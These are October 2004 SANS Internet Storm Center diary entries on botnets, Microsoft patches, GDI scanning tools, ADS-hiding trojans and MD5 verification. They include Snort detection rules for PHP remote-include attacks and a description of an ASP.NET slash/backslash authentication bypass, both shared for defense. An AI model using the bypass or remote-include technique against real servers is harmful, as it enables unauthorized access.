Thanks to: Myles, Michel, and Joseph for updating us.


Handler on Duty: Tom Liston (pinch hitting for John "Sandman" Bambenek)


Published: 2004-10-16

BotNets and Security Awareness in Academia; Potpourri of MS04-028 Scanning Tools from MS

BotNets and Security Awareness in Academia
For those in Academia (or similarly open networks), I urge you to pay attention to your networks. As Deb mentioned several days ago, and many of the handlers have noted since, botnets are continuing to grow more wide spread. The types of exploits used to gain access do change as we go along, and the complexity of the files used, rootkits deployed, etc etc has also increased. The particular variation of BotNet, I have seen on my campus seems to have used the LSASS vulnerability to gain access to the computers. Many of the tool names seem to be different depending on who and where things are being exploited. As a guess, I would suspect that a framework has been built that any reasonably computer literate user can easily change a few settings, and compile/pack/deploy their own unique set of tools. Several of the handlers are still working on writing a more complete article of the details that will be posted later.
Yeah...I know none of this is news, but it has made me wonder what more can I do beyond intrustion detection,updating AV, firewalling and quarantining off computers that are not patched or otherwise insecure, and whatever remediation seems wise for any particular situation. The one thing I have realized for my campus is that things are not seeming to get any better security wise. The reason...we are not causing our userbase to be more aware of proper security procedures. The technologies the hackers are using have continued to work but we have failed to change from a reactive stance to a proactive one despite expenditures for the above security devices, staff, and initiatives.
This month is Cyber Security Awareness month, so what have you done on your campus to promote Security. I have heard of one University that purchased a number of toothbrushes that had slogans to the effect of "You don't share your toothbrush, why share your passwords?" Such gimics are very good ways for security professionals to start making our students/faculty/staff actually think about what they are doing and raise the amount of awareness. But probably most of us had never thought of such things.
At the Educause conference this week, participants will receive a CD of Security Awareness Resources that was compiled through the efforts of many organizations. If you are in academia and are not at the conference, please make sure that you catch those at your organization bring you a copy of the CD and start considering how you can raise the awareness of your campus. For more details about the CD, please see the following from the Educause security mailing list:

Potpourri of MS04-028 Scanning Tools from MS

This week, MS released several new or updated tools to help get a handle on the MS04-028 GDI vulnerability from last month. One of the handlers provided a list of them today to include into the diary. As with the previous tools issued by MS, these tools do not appear to detect the existence of third-party software that may have included the DLLs. However, this is a starting point for many corporate technicians to roll out. I would still recommend using the ISC's GDI Scan tools available at
http://isc.sans.org/gdiscan.php in conjunction to these tools to provide the best coverage as possible.

* Enterprise Update Scanning Tool for Bulletin MS04-028


This tool is a command line scanning tool built for the sole purpose of
helping customers determine systems that may need security updates provided
with the MS04-028 bulletin
http://www.microsoft.com/technet/security/bulletin/ms04-028.mspx . Users of
this tool should have experience in deploying software to corporate
environments and with using command line tools. More information on this
tool can be found in the Knowledge Base article 886988 (KB886988)

How to obtain and use the MS04-028 Enterprise Update Scanning Tool in
environments that do not use Systems Management Server
* SMS MS04-028 Update Scan Tool


This tool is a scan tool built for the sole purpose of helping customers
determine SMS client computers that may need security updates provided with
the MS04-028 bulletin. Like MBSA, this tool also has the instructions for
SMS to locate each applicable update and download it from Microsoft.
* Enterprise Logon Scripts

Logon and Group Policy scripts are powerful, flexible tools that system
administrators can use to provide users with a consistent, predictable, and
secure computing experience.
* Sample Scripts for verifying client configuration for VPN Quarantine


Scott Fendley

Handler on Duty


Published: 2004-10-15

Manager's Briefing for Microsoft Security Bulletins, MS04-036 Exploit Code, VERITAS Security Patch, Comxt Alternate Data Stream Trojan

Senior IT manager's briefing for this month's Microsoft Security Bulletins

Hot off the press: Marcus Sachs put together a set of PowerPoint slides that provide an overview of this month's Microsoft Security Bulletins from the perspective of senior IT managers. The briefing provides high-level descriptions of the vulnerabilities, explains their relevance, and suggests corrective actions.

Power Point File: http://isc.sans.org/presentations/MS04Oct.ppt
Proof-of-concept exploit for the Windows NNTP vulnerability (MS04-036)

If you were wondering how quickly you needed to apply the patches that Microsoft released a couple of days ago, please keep in mind that proof-of-concept exploit code for the Windows NNTP vulnerability (MS04-036) is publicly available. The recent Core Security advisory includes the exploit code, and provides detailed technical information about the vulnerability, which they seem to have reported to Microsoft in mid-August. The Core Security advisory was published just hours after the patches became publicly available--this is a good illustration of the rapidly shrinking time window in which you need to apply security patches. ( http://www.coresecurity.com/common/showdoc.php?idx=420&idxseccion=10 )

A "serious" security vulnerability in VERITAS Cluster Server

VERITAS issued patches to address the "potential for a serious system security breach" in VERITAS Cluster Server for all UNIX platforms. According to the company's advisory, the recently-discovered flaw may provide the attacker with unauthorized root access to the server. ( http://seer.support.veritas.com/docs/271040.htm )

It's tough to assess the severity of this vulnerability, because the advisory doesn't provide any details regarding the issue. Is the problem exploitable over the network, or is local access to the server required? How difficult is it for the attacker to exploit the vulnerability? The generic advice is often to apply the patch as soon as possible; however, real-world system administrators need additional information to prioritize the issue, weighing its risk against other technical and business concerns.

A note at the bottom of the VERITAS advisory suggests that its customers may be able to obtain additional information about the patches by contacting VERITAS Technical Support.

The Comxt trojan and the use of NTFS Alternate Data Streams

The Comxt trojan is somewhat unusual in that it uses NTFS Alternate Data Streams (ADS) to hide its presence in a directory. Although this is not the first such malware specimen, the use of ADS for hiding malicious executable code is not yet widespread. More information about the Comxt trojan is available at:


If you have a copy of Comxt, and don't mind sharing it with us, please send it our way. To learn about ADS take a look at the Hidden Threat: Alternate Data Streams article at:


The article mentions several tools that can detect the presence of ADS on your system. In addition, you may want to check out the Stream Shell Extensions utility that Ryan Means created as part of his GCWN practical write-up on the topic. Ryan's utility adds a "Streams" tab to Windows Explorer when you look at a file's properties; the tab allows you to view and delete streams hidden in the file. You can access the utility and the paper at the following URLs:



Note that anti-virus software varies in its ability to detect malware in ADS. When fellow handler Ed Skoudis tested anti-virus products for his June 2004 Information Security article, he found that only "Network Associates detected malware in ADSes during both on-demand and real-time scans with its default configuration... Default real-time protection against ADS-borne malware is also provided by Computer Associates (CA), F-Secure, Grisoft, Panda Software and Sophos." ( http://infosecuritymag.techtarget.com/ss/0,295796,sid6_iss407_art803,00.html )

Lenny Zeltser

ISC Handler of the Day



Published: 2004-10-14

New Netsky Variant

There appears to be a new version of netsky circulating, several antivirus vendors have updated definitions. System admins, and users should check to verify that virus definitions are up to date. Although it appears that it does not distribute it, this new variant does include some password stealing code which was originally from BugBear, it is quite possible that even after the removal of the virus, your system could still have passwords stored on it, which might have already been retrived, for this reason, it is safe to recommend that any password for any user which uses a machine which is found to be compromised should be changed.

Botnet information still needed

We have got a lot of botnet information, but we continue to need more, please continue to forward any information you get to us.

Michael Haisley mhaisley@isc.sans.org


Published: 2004-10-13

Aftermath of Microsoft's October Bulletins, more bots, and Linux rootkits

Did you miss the ISC monthly webcast?

It seems that most folks must have spent today trying to digest the 10 Microsoft bulletins released yesterday, because our mailbox was relatively quiet today. That was a large portion of today's monthly ISC webcast. If you missed it live, you can still check it out in the archives. Go to:

Possibly lost in the release of the 10 new bulletins, Microsoft also updated MS04-028 yesterday.

Chasing botnets

Please continue to let us know when you discover botnets and especially if you know how the zombies got infected and where the controller is located. We had a reader today who was able to get onto the IRC server that was controlling the botnet and get a list of infected machines. We're in the process of getting the botnet shut down. Today's victims were infected by what Symantec identified as Trojan.Webus.C and Trend identified as WORM_RANDON.B. Our thanks to Mike for bringing this to our attention.

Linux rootkits

A couple of the handlers are doing to some research on the current state of Linux rootkits, if you have any copies of recent (new in the last year or so) versions of Linux rootkits that you'd be willing to share with us, please upload through the contact form. Thanx.


Jim Clausing, jclausing/at/isc.sans.org


Published: 2004-10-12

October Microsoft Security Bulletins

October Microsoft Security Bulletins. Ten bulletins (seven critical, three important) were released by Microsoft today at http://www.microsoft.com/security/bulletins/200410_windows.mspx and http://www.microsoft.com/security/bulletins/200410_office.mspx

Here is a brief synopsis:

MS04-029 IMPORTANT Vulnerability in RPC Runtime Library Could Allow Information Disclosure and Denial of Service (873350)

An information disclosure and denial of service vulnerability exists that could cause the affected system to stop responding or could potentially read portions of active memory content.

MS04-030 IMPORTANT Vulnerability in WebDav XML Message Handler Could Lead to a Denial of Service (824151)

A Denial of Service vulnerability exists that could cause the affected system to stop responding to requests.

MS04-031 IMPORTANT Vulnerability in NetDDE Could Allow Remote Code Execution (841533)

A remote code execution vulnerability exists in the NetDDE services because of an unchecked buffer.

MS04-032 CRITICAL Security Update for Microsoft Windows (840987)

A remote code execution vulnerability, two elevation of privilege vulnerabilities, and a denial of service vulnerability exist in Windows. The most severe vulnerability could allow remote code execution on an affected system.

MS04-033 CRITICAL Vulnerability in Microsoft Excel Could Allow Remote Code Execution (886836)

A vulnerability exists in Microsoft Excel that could allow remote code execution on an affected system.

MS04-034 CRITICAL Vulnerability in Compressed (zipped) Folders Could Allow Remote Code Execution (873376)

A vulnerability exists in the way that Windows processes compressed (zipped) folders that could allow remote code execution on an affected system.

MS04-035 CRITICAL Vulnerability in SMTP Could Allow Remote Code Execution

A vulnerability exists in the Windows SMTP component and Exchange Server Routing Engine component that could allow remote code execution on an affected system.

MS04-036 CRITICAL Vulnerability in NNTP Could Allow Remote Code Execution

A vulnerability exists in the Windows NNTP Component that could allow remote code execution on an affected system.

MS04-037 CRITICAL Vulnerability in Windows Shell Could Allow Remote Code Execution (841356)

A vulnerability exists in the way that the Windows Shell launches applications. A vulnerability exists in Program Group Converter because of the way that it handles specially crafted requests. Both could allow remote code execution on an affected system.

MS04-038 CRITICAL Cumulative Security Update for Internet Explorer (834707)

Five remote code execution and three information disclosure vulnerabilities exist in Internet Explorer.


Published: 2004-10-11

Web based GDI Vulnerability Scanner; Yet even more fun with bots; Spybot.Worm and Gaobot; MSN Chat access troubles

The ISC now offers a web based GDI Vulnerability Scanner at http://isc.sans.org/vulnscan/iscvuln.php

** Note that it uses an ActiveX control and only runs with Internet Explorer.
Usually I would be on a soap box at this point regarding applications that require one browser versus another but I will give it a rest today.

Yet even more fun with bots.

There has been a lot of talk about hidden bot files lately. Some of the discussion surrounds finding the hidden exes.
To find hidden bot files
Run attrib in c:\windows and c:\windows\system32 looking for files marked SHR from a command prompt.
The command could be

cd c:\winnt\system32 (or cd c:\windows\system32)

attrib | findstr SHR

Windows explorer will not display these files even with show hidden files enabled.
To remove them use attrib -r -s -h <filename> and then you can move or delete them.

Tips and techniques for tracking down Spybot.Worm or Gaobot

1) Do you have current anti-virus definition files?

2) Has your hosts file been rewritten? C:\winnt\system32\drivers\etc

3) Do you have a lot of unidentified connects to the system - Start - Run - cmd, at the command prompt type netstat -an. Take a look at the devices that are listed. Do you recognize all of the ips?

4) If you go into windows task manager do you see any processes running that you don't recognize?

5) If you are comfortable with regedit, go to HKEY_LOCAL_MACHINE - software - microsoft - windows - current version. You should see run and run once and run services, (you may or may not see run services). Do you see any entries that you don't recognize or look suspicious?

Thanks to handler Deb Hale for these tips.

MSN Chat access troubles
There are some reports of trouble accessing MSN, we have very little detail at this point and do not know the cause.


Published: 2004-10-09

Botnets, PHP includes

Still More Botnets:

We're receiving yet more reports of successful social engineering attacks and
GDI+ JPEG attacks that cause a UPX'ed and Morphine'd trojan horse (Gaobot, SDbot,
RxBot) to be installed, and the resultant botnet used for typical nefarious

Most current AntiVirus packages don't properly unpack these binaries, and don't
detect them terribly well. There are also reports that some of them are
interfering with automated AV update procedures.

Patches applied to both the computer itself and the user at the console should be
sufficient. If you have the facility to capture, or block, IRC traffic to
unknown IRC servers (sometimes not on port 6667/tcp, either), you can potentially
disrupt the botnet.


We received a report of a webserver being compromised via a long-standing
problem with a PHP script package; EasyDynamicPages:

The following Snort rule should catch attempts:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP EasyDynamicPages exploit"; \
classtype:web-application-activity; sid:900018; rev:1; \
reference:url,www.securitytracker.com/alerts/2004/Jan/1008584.html; reference:cve,CAN-2004-0073; \
flow:established,to_server; uricontent:"edp_relative_path=";)

Also, be aware that EDP isn't the only vector to this vulnerability. Any PHP
page that arbitrarily include()'s from a variable that can be filled in by
a remote attacker can be exploited in a similar way:

Perhaps a more generic method might be to search for URL's in your URI's,
which shouldn't happen unless you're proxying or doing odd redirects,
which happens far more often than it really should. YMMV.

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg: "handlers experimental -- URL in URI proxying with arg stacking"; \
classtype:string-detect; sid:900019; rev:1; priority:4; flow:to_server,established; tag:host,90,seconds; \

At any rate, if you're a PHP developer, you should probably triplecheck your code
to make sure that an attacker can't feed you a URL like this, and if you have PHP
on your server, you should probably disable allow_url_fopen if you haven't



Published: 2004-10-08

Sans Top 20 - 2004 - How does it compare to 2003 Top 20; Microsoft ASP.NET ValidatePath Module; IRC Botnet Servers

For those that are interested in how the SANS 2003 Top 20 List compares to the SANS 2004 Top 20 List we are providing the links to both lists here.

SANS Top 20 for 2003

SANS Top 20 for 2004
Microsoft ASP.NET ValidatePath Module

Microsoft is currently investigating a reported vulnerability affecting ASP.NET that could allow an attacker to send a specially-formed URL request that could result in the system bypassing authentication and disclosing content.

IRC Botnet Servers
It has been a pretty quiet day on the Internet all in all. We are still receiving many reports of W32.Spybot.Worm and GAOBOT infections. We would be interested in hearing from people that are battling this worm, what are you seeing, what files have you found that are affected, what has the impact been on your organization? I will try to take the information that we receive and do an overview of the information we receive in a future Diary.
Handler On Duty
Deb Hale


Published: 2004-10-07

MS Office buffer overflow vuln, still more botnets, and don't be a baddie, be a goodie!, 2004 SANS Top 20 List

Office BOF - might be exploitable

Well, next week will bring another round of Microsoft patching goodness, a hint of which came from Secunia:


"HexView has discovered a vulnerability in Microsoft Word, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a user's system."

"The vulnerability is caused due to an input validation error within the parsing of document files and may lead to a stack-based buffer overflow."

IMHO, the best part of the advisory is the recommended solution - "Open trusted documents only." Until details are made available, here are your options - choose any two:

A - Don't open documents that you can't establish a complete chain of custody within your trusted domain

B - Set your Internet Zone security to "High" and/or don't download files that would be rendered by MS Word

C - Don't use Word. There are alternatives (ie. OpenOffice.org) that haven't sufferred the same attention from exploit developers

D - Cross your fingers and shoot dice

Now, I have no knowledge of the existence of such an inclusion in next week's patches, nor would I be at liberty to discuss the details contained within that inclusion, if in fact, such an inclusion exists. Sir.

Botnets abound

As the ISC continues to work with network service providers to shut down large networks of compromised machines ( http://isc.sans.org/diary.php?date=2004-10-05 ) , new ones keep cropping up. Most of these "botnets" use IRC for communication, sometimes on public networks ( http://zine.dal.net/previousissues/issue22/botnet.php ), but often run on private servers installed on well-connected compromised hosts. These servers can be readily moved to another location and re-join the botnet with little effort, making it difficult to shut down the larger nets. One of the honeypots at ISTS http://www.ists.dartmouth.edu was compromised with a new SDbot variant and joined in the fray. The server it connected to reported:

There are 1 users and 10034 invisible on 17 servers

I counted over 900 unique hostnames joining one botnet channel on this network in the past 24 hours, but the only command issued was a simple scan request.

Folks, the variant of SDBot that hit the honeypot wasn't detected by 11 out of 13 antivirus programs I scanned it with. A/V alone won't defeat this rising tide. Please have a look at your perimeter sensors and keep an eye out for port 6667 traffic, especially at odd hours. If you see any that can't be attributed to deliberate user actions, capture some packets and shoot them off to us.

Vulnerable GDI dlls in unexpected places
One writer sent in:

I downloaded the GDI+ detection-tool from <http://isc.sans.org/gdiscan.php>
and it reported a vulnerable file:

Directory of C:\Program Files\Microsoft Works
06/20/2002 03:23 AM 1,708,036 gdiplus.dll

Compare to the "patched" file, in other folders:
08/04/2004 12:56 AM 1,712,128 gdiplus.dll

Microsoft Works 7, rather than Microsoft Office, is installed.

The Microsoft detection-tool did *NOT* identify that "Microsoft Works 7"
has this vulnerability. D'oh!<sic>

The Microsoft "home-page" for MS Works does not document this vulnerability.

So, it's time to check all your associates' computers,
looking to patch this vulnerability within that software,
because Microsoft is doing a sloppy job of identifying this vulnerability.

Thanks for that tasty tidbit!

Please be goodies, not baddies

We really appreciate all of the good information that the community (you!) provides the ISC. This is precisely why it works as well as it does. Please remember, however, that we, and many of you, are bound by implied and specific non-disclosure agreements (NDAs). If a vendor provides you with a limited-distribution notice, consider if it is worth your relationship with them (or your job, in some cases) to release that outside of your organization. Maintain your personal, professional and contractual trust relationships, please; we have to discuss this among ourselves at length whenever proprietary info is dropped on us.

Also on the topic of goodness, not badness - stop and think for a moment before breaking out your latest scanner-du-jour in response to an intrusion attempt. Many folks, when asking the ISC for assistance in dealing with an attacker, provide all kinds of scan output. I know it is often enlightening (and sometimes downright entertaining!) to learn about the systems that are throwing evil packets your way, but to the other side, you appear just as guilty of unauthorized activity.

Rule #1 in responding to an attack - Keep a low profile!

2004 SANS Top 20 List will be released on October 8th. Details at http://www.sans.org/top20/
Keep those cards and letters coming!



Published: 2004-10-06

Microsoft ASP.NET vulnerability, URL obfuscation, more MD5

Microsoft ASP.NET vulnerability (updated Oct. 7th) Microsoft announced a possible vulnerability in ASP.NET ( http://www.microsoft.com/security/incident/aspnet.mspx ). There are not much details so far, but it refers to the "canonicalization" functionality and suggest to implement then hardening measures outlined in KB887459 ( http://support.microsoft.com/?kbid=887459 ). It appears that a particularly crafted request may confuse ASP.Net and allow access to otherwise protected directories. If a web server receives a request for a particular URL (e.g. _http://server/somedirectory/filename), the 'somedirectory/filename' part has to be mapped to a particular file located on the server. This translation has been the source of many "directory traversal" bugs. The IIS unicode exploit is probably the most famous one. After our original posting of this diary, a few users pointed to the following articles which provide more details then provided by Microsoft's advisory:
(Thanks to Chaouki & Daniel)
http://www.heise.de/security/news/meldung/51730 (german)
http://blogs.devleap.com/rob/archive/2004/10/02/1803.aspx (italian)
http://www.k-otik.com/news/10052004.ASPNETFlaw.php (french)
It appears that by switching a '/' character in the URL with '\' or '%5C', the canonicalization routine will be confused. So if the URL:
is password protected, using the either of the following URLs will bypass the restriction:
In addition to the slash/back-slash confusion, one reader reports that inserting a space will bypass the URL restriction as well:
(had no chance to validate this method so far)
URL Obfuscation Handler and star SANS instructor Ed Skoudis compiled a comprehensive list of various URL obfuscation methods used in phishing schemes and spam. Some of these methods do not work with all browsers (e.g. the %01 issue in older Internet Explorer versions). In order to preserve the tricky details of some of these methods, we setup a page which includes just the URL methods without our usual header and footer: http://isc.sans.org/presentations/urlobfuscation.php (to view as source: http://isc.sans.org/presentations/urlobfuscation.txt ). Jan Reilink wrote to point us to this page with more details about URL obfuscation and decoding: http://www.pc-help.org/obscure.htm . DDOS in progress A reader noted that a system on his Universities campus participated in a DDOS attack against If you see any machines with excessive traffic to this IP address, please investigate further. We still need a copy of the respective malware to identify the controller. More MD5 sum tools Raul pointed out a nice MD5 sum tool, 'md5deep'. It will traverse directories and supports various hash formats. For details, see http://md5deep.sourceforge.net/ . Another reader suggested digestIT: http://digestit.kennethballard.com/features.html . It integrates with Microsoft Explorer which makes it particularly easy to use. _____________
Johannes Ullrich. jullrich |a_|sans.org


Published: 2004-10-05

A trojan that deletes spyware? - More botnet fun - World record attempt

Anti Spyware Trojan?

As reported by ISC Handler Pat Nolan, a new trojan has been released into the wild that seems to terminate processes and delete files and registry keys known to be associated with adware products. More details are available at http://securityresponse.symantec.com/avcenter/venc/data/downloader.lunii.html


We've received reports of a few new botnet infestations of the same critter Deb Hale reported in http://isc.sans.org/diary.php?date=2004-09-25 . Botnets are a perfect example of why you need to know what's normal on your network and what's not. Great job Dan and Mr. Anonymous Senior Analyst. ;)

Speaking of botnets ...

The ISC was alerted to a .jpg image file (thanks Mark!) that had an MS04-028 overflow which caused the machine to download and run an executable, jpeg.exe

jpeg.exe silently installs a service on the PC as well as a registry key to autorun at reboot, then goes out to an IRC site, notifies of the compromise and waits for commands.

Actions have been taken to have the offending site blocked.

AV scan results of jpeg.exe are as follows (from http://www.virustotal.com ):

Antivirus Version Update Result

BitDefender 7.0 10.05.2004 Backdoor.Hackarmy.1.Gen

ClamWin devel-20040922 10.05.2004 -

eTrust-Iris 10.04.2004 Backdoor/AZV.Variant

F-Prot 3.15a 10.05.2004 W32/Hackarmy.AJ@bd

Kaspersky 10.05.2004 Backdoor.Hackarmy.gen

McAfee 4396 09.29.2004 BackDoor-AZV.gen

NOD32v2 1.884 10.04.2004 probably unknown NewHeur_PE

Norman 5.70.10 09.30.2004 W32/Backdoor

Panda 7.02.00 10.04.2004 Bck/HackArmy.T

Sybari 7.5.1314 10.05.2004 Backdoor.Hackarmy.gen

Symantec 8.0 10.04.2004 -

TrendMicro 7.000 10.04.2004 -

Bellhops and luggage carts and sheets, oh my!

While SANS NS Las Vegas 2004 will remain firmly engraved in many people's memory, it hopefully won't be remembered for the record attempt mentioned previously, that eventually failed. We're happy to report that there were no serious injuries and that all handlers have (apparently) survived unharmed. It should be noted however that the handler attempting the record has not been heard from since just after the attempt when he was seen with several statuesque showgirls. Good luck Tom, wherever you are. ;)

Chris Carboni

Handler on Duty


Published: 2004-10-04

MD5 Checksum Updated / MD5 Tools for Win32 / Botnets reports

MD5 Checksum, Updated

The following is Lorna's update from her diary yesterday:

This update is in response to many emails from the user community about the entry regarding using MD5 checksums. Thanks for writing in and sharing your thoughts!! Many people question the need for using MD5 checksums since a hacker can modify the checksum as well. I don't disagree at all, however, measures can and should be taken to protect the location of where the MD5 checksum is stored so they at least have to work for it. However, the responses that we received enforced the point I was trying to make. Most folks aren't checking them, so why should a hacker go through the trouble of modifying them? We only got one response telling us the hash was wrong for the latest update, maybe only one person downloaded it since we updated it and maybe others simply did not respond about it. However, if a hacker has modified the file, but did not modify the checksum it may save you much pain and confusion if you spot this early. One step farther, if YOU don't know what the checksum is for file your providing, how do you know its not been modified? It wouldn't take much to write a script that checks the values of the MD5 checksums against known good values and ensure they have not be changed or better yet, store them on another server. Keep a copy of the valid checksums on a separate media or burn them onto a CD so you know what the valid hash should be. The MD5 checksum is NOT meant to be a single solution to the problem, but it is a tool that should be part of your security regime.

As a secondary note, we have had questions about what to use to do a md5 checksum on Windows. I personally use MD5sum.exe on my windows systems. A quick search on Google will also point at others that are available. Once again, thanks for all the emails.

MD5 Checksum Tools

For those asking us about tools to check the md5 Checksum in Windows OS, here is a small list of such applications:

- md5sum.exe - from http://www.etree.org/md5com.html
- Unixtools - http://unxutils.sourceforge.net
- md5summer - http://www.md5summer.org

Botnets reports

We received some questions from users about the authorities referenced by Lorna on yesterday´s diary.

When we receive such reports,we notify a security contact at the ISP that was providing network access and their upstream ISP.

We provided portions of the information the we receive as
evidence of AUP violation, but always preserving the privacy of user

Once again, thanks for all reports!


handler on Duty: Pedro Bueno (pbueno /AT/ isc.sans.org )


Published: 2004-10-03

Botnet Report; MD5 Checksum; Handlers Update, Live from Las Vegas

Botnet Report

A large botnet was reported to the handlers by Vidar Wilkens from Telenor.com, that was actively engaging in exploiting IP addresses. The information was passed on to the proper authorities for investigation. More information will be made available when we are able to do so.

MD5 Checksum

Since the development of the Gdiscan tool by our very own Tom Liston, it has gone through many iterations and changes which have required the MD5 checksums to be updated as well. Surprisingly, very few have questioned the hashes when they haven't matched after an update. If you aren't in the habit of checking the MD5 hashes of files, its important that you do so. While, not fool proof, the hash can tell you whether the file has been modified. Everyone should remember a couple of years back when SendMail was compromised with a Trojan and the only way to verify if the file you downloaded if you didn't have PGP was to check its MD5 checksum. If you don't do it now, start making it a habit to verify what you are downloading. For more information on the SendMail compromise see

SANS Handlers Make Land Sailing Record Attempt

Dateline- Las Vegas

Written by: An anonymous handler (however, initials are TL)
In the windy hallways of the Riveria Hotel in Las Vegas Nevada, the SANS
Internet Storm Center Handlers are planning to make an attempt to set the
World's Speed Record for sailing a bellhop luggage cart using a hotel bedsheet
as a sail. Unbelievably, it is claimed that the consumption of alcohol is not
involved in the attempt, but rather simply some strange combination of geek
curiosity and testosterone. We will update the diary with the results of this
grand experiment and tell you to which hospital cards and flowers are to be sent.

Lorna Hutcheson


Handler on Duty


Published: 2004-10-02

Vendors Take Note, Mark II, DHS Cyber Chief Departure


In September 27th's diary entry, Joshua Wright included a stanza asking software vendors to determine whether or not their software has distributed vulnerable gdiplus.dll libraries, and provide appropriate replacements as soon as possible. Reports from users of Tom Liston's GDIscan ( http://isc.sans.org/gdiscan.php ) of finding vulnerable versions in a variety of software applications has continued. This morning, Will Harper wrote in requesting the Handlers expand our notice to these vendors.

If your software package utilizes the gdiplus.dll library, please notify your users by e-mail or a posting to your website with the application-specific fix necessary to close this vulnerability as soon as possible. Suggestions are to instruct the users how to copy a non-broken version over the vulnerable one, or provide a properly fixed version themselves.

Editorial: DHS Cyber Chief Departure.

Many in the cyber security community were shocked to learn of Amit Yoran's departure from the Department of Homeland Security's National Cyber Security Division on Friday. Amit was appointed in September 2003 to head the NCSD, which
was formed in June of that year. The NCSD was not part of the original
design of DHS, but was added to the Department's structure after intense
lobbying from both industry and government officials. It is unfortunate
that Amit choose to leave after only a year at the helm of the NCSD, but
we applaud the work he did over the past year and extend our
appreciation to him for his service.

It is important that DHS move quickly to find a new cyber chief who can continue the work started by Amit. This person needs to be able to work directly with cyber security policy officials in the Office of Management and Budget and the Homeland Security Council in the White House, as well as with CIOs and CISOs of
the other federal departments and agencies. Additionally, the next
chief needs to have close ties with cyber security leaders in industry,
academia, and especially the international community. Cyber security is
too important to bury under layers of bureaucracy. A strong partnership
between the public and private sectors, both domestically and
internationally, is needed to ensure the security and reliability of the
global Internet. (Written by Marcus Sachs, ISC Director)

Dave Brookshire, dsb AT parapet DOT net



Published: 2004-10-01

GDI Attacks via Email; Natural Disasters and Data Recovery / Data Security

GDI Attacks via Email

We have received a few reports of email messages containing JPEG images which appear to be intended to attack the GDI vulnerability.

Natural Disasters and Data Recovery / Data Security

This story was relayed by Scott Fendley, another ISC Handler:

A co-workers son and family live in the area of Florida being devastated by all the recent hurricanes. Prior to one of the latest hurricanes, they decided to leave the area to go stay with relatives somewhere safer. They took some things with them (perhaps some important documents as well) but left their computer at home -- their computer with all their digital pictures and online banking and other financial information. Upon their return, they discovered the house had been flooded with up to four feet of water.

Their insurance company said to place all of the damaged property outside in front of the house to make it more convenient for when the claims adjuster came by. They put out all of their damaged furniture as well as their computer. That night, someone came by and stole the computer.

Well, the computer may have been destroyed, but the hard drive was probably still functional if removed and installed into another computer, so someone could have just gotten lots of personal and financial information about these folks such as bank accounts, credit cards, etc.

What about paper records (such as monthly banking and credit card statements) that may have been turned into a soggy mess as well? Was this all just thrown out where it could be scavenged as well?

Data Recovery: When making backups of your data, you need to take into account what you need to backup, how to back it up and where to store the backups. In this case, if they made backups of their online financial data onto Zip disks and stored the disks at home, those backups may not be available or in usable condition. Periodically backing up your data to a removable USB/Firewire hard drive and storing the drive at another physical location would greatly increase the likelihood of having a usable backup afterwards in such a disaster.

Data Security: How do you dispose of such data? If you have a bad hard drive, do you just throw it out or do you physically destroy it up with a hammer? Do you just throw out records with personal information such as account numbers or do you shred such paper? If you shred it, do you use a strip shredder or a cross-cut shredder which results in many more much smaller remnants?

Scott's acquaintance's relatives are now having to contact all of their financial organizations to get new account numbers, new PINs, place a notice on the credit reports -- all to hopefully minimize, if not eliminate, the risk of them becoming the victims of identity theft due to the potential loss of sensitive data.


David Goldsmith

dgoldsmith at isc.sans.org